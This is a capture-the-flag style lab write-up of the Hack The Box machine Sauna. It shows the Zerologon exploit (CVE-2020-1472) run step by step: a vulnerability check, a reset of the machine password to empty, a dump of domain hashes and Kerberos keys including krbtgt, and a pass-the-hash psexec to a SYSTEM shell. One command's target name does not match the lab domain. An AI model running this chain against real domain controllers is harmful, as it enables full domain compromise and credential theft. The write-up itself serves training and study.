CVE-2020-1472

zerologon attack enables an unauthenticated attacker to remotely escalate their privileges straight to Domain Admin, with network access to a domain controller as the only requirement.

the vulnerability is present at an insecure implementation of AES-CFB8 in the MS-NRPC by brute-forcing the authentication up to 256 times with a challenge and ciphertext consisting of 8 zero-bytes \x00', resulting the eventual match that leads to authentication bypass as the machine account. It then resets the password empty.

more about this vulnerability here

The target system is likely vulnerable given the fact that it is running Windows Server 2019 Datacenter

exploit (zerologon)

I got the exploit script from the GitHub repo

Testing

┌──(kali㉿kali)-[~/…/htb/labs/sauna/CVE-2020-1472]
└─$ cme smb $IP -d EGOTISTICAL-BANK.LOCAL --kdcHost sauna.egotistical-bank.local -u '' -p '' -M zerologon        
smb         10.10.10.175    445    sauna            [*] windows 10.0 build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
smb         10.10.10.175    445    sauna            [-] egotistical-bank.local\: STATUS_ACCESS_DENIED 
ZEROLOGO... 10.10.10.175    445    SAUNA            VULNERABLE
zerologo... 10.10.10.175    445    sauna            next step: https://github.com/dirkjanm/CVE-2020-1472

crackmapexec has a module available to test for the zerologon exploit above As the result shown above, the target system is confirmed to be vulnerable

For this exploit, I don’t even need a credential

Exploitation

┌──(kali㉿kali)-[~/…/htb/labs/sauna/CVE-2020-1472]
└─$ python3 ZeroLogon.py sauna $IP  
Performing authentication attempts...
===================================================================================================================================================================================================================================================================================================================================================================================================================================================================
Target vulnerable, changing account password to empty string
 
Result: 0
 
Exploit complete!

Done I never needed any credential. Hence the name of the exploit, ZeroLogon The machine account printer$ now should have no password

At this point I can do anything

Hashdump

┌──(kali㉿kali)-[~/…/htb/labs/sauna/CVE-2020-1472]
└─$ impacket-secretsdump 'sauna$@printer.return.local' -no-pass -target-ip $IP -dc-ip $IP   
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[-] remoteoperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] dumping domain credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
egotistical-bank.local\hsmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
egotistical-bank.local\fsmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
egotistical-bank.local\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
adm1n:4105:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
sauna$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
win-avobjsnqi4e$:4101:aad3b435b51404eeaad3b435b51404ee:f5d7c0e3775ca7a325a2d9ea1d6aa85c:::
win-argri7mjoku$:4102:aad3b435b51404eeaad3b435b51404ee:c8c3b17e8cbb1ad86660af0c61a221e4:::
win-ebz40ev7hgq$:4103:aad3b435b51404eeaad3b435b51404ee:a2d799f8f8037cb6d2ad9d5bd932068f:::
win-ik7zyrl5njl$:4104:aad3b435b51404eeaad3b435b51404ee:5768aa508c9322dfefd3d59ca4b58eb3:::
[*] Kerberos keys grabbed
administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
egotistical-bank.local\hsmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
egotistical-bank.local\hsmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
egotistical-bank.local\hsmith:des-cbc-md5:1c73b99168d3f8c7
egotistical-bank.local\fsmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
egotistical-bank.local\fsmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
egotistical-bank.local\fsmith:des-cbc-md5:b50e02ab0d85f76b
egotistical-bank.local\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
egotistical-bank.local\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
egotistical-bank.local\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
adm1n:aes256-cts-hmac-sha1-96:d802ee1431bcec7be2b4ed46375227d48ff0d44b92a3a588400465046695dba9
adm1n:aes128-cts-hmac-sha1-96:51b6f3c5c9462ab307504e46e052494a
adm1n:des-cbc-md5:34a11a0e267a7354
sauna$:aes256-cts-hmac-sha1-96:d7982110e2effab0df3576bc1232329b9b6a60a58229c8af5611af84422caf84
sauna$:aes128-cts-hmac-sha1-96:ffe571ff1515a089853a6b05e6b5316e
sauna$:des-cbc-md5:23923eae7cdf4334
win-avobjsnqi4e$:aes256-cts-hmac-sha1-96:ae10bf959b90ebbeecd67b223b6974d235f8118dcd870e72fb25090577a86fd6
win-avobjsnqi4e$:aes128-cts-hmac-sha1-96:b5b6c8e3a72a3d8bdaedcf4e5e305d3d
win-avobjsnqi4e$:des-cbc-md5:2643d5f410e515fe
win-argri7mjoku$:aes256-cts-hmac-sha1-96:ebeb999cdaae3ebccdd641a8be90b75a915dfa8db22b78174e4e90b0849353df
win-argri7mjoku$:aes128-cts-hmac-sha1-96:e84073c311e90e0fa4dd96cfc1d94dcc
win-argri7mjoku$:des-cbc-md5:202f04a17c542513
win-ebz40ev7hgq$:aes256-cts-hmac-sha1-96:b86fb98b7f2cf65e1dd9cba8a1934d9879b1d217fb9455813b80609340950e5b
win-ebz40ev7hgq$:aes128-cts-hmac-sha1-96:bc32b1af2530c2ff8f21882655045f65
win-ebz40ev7hgq$:des-cbc-md5:a840cb4fc2734c04
win-ik7zyrl5njl$:aes256-cts-hmac-sha1-96:e217b9f35e815c1ade0ee4c4fe5b968b7875095aad86951d13eb1f98de1afea3
win-ik7zyrl5njl$:aes128-cts-hmac-sha1-96:729a5381641f29b1962bf7f05d179b8f
win-ik7zyrl5njl$:des-cbc-md5:cedc0d3e5dbab301
[*] Cleaning up...

Domain Level Compromise

Shelldrop

┌──(kali㉿kali)-[~/…/htb/labs/sauna/CVE-2020-1472]
└─$ impacket-psexec administrator@sauna.egotistical-bank.local -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e' -dc-ip $IP 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Requesting shares on sauna.egotistical-bank.local.....
[*] Found writable share ADMIN$
[*] Uploading file ipGixlWT.exe
[*] Opening SVCManager on sauna.egotistical-bank.local.....
[*] Creating service QQnB on sauna.egotistical-bank.local.....
[*] Starting service QQnB.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
SAUNA
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::17a
   IPv6 Address. . . . . . . . . . . : dead:beef::64df:5bff:4879:1d8b
   Link-local IPv6 Address . . . . . : fe80::64df:5bff:4879:1d8b%7
   IPv4 Address. . . . . . . . . . . : 10.10.10.175
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%7
                                       10.10.10.2

System Level Compromise

InfoSec LAB

Explorer

Sauna_Privilege_Escalation_5

CVE-2020-1472

exploit (zerologon)

Testing

Exploitation

Hashdump

Shelldrop

Interactive Graph View

Table of Contents

Backlinks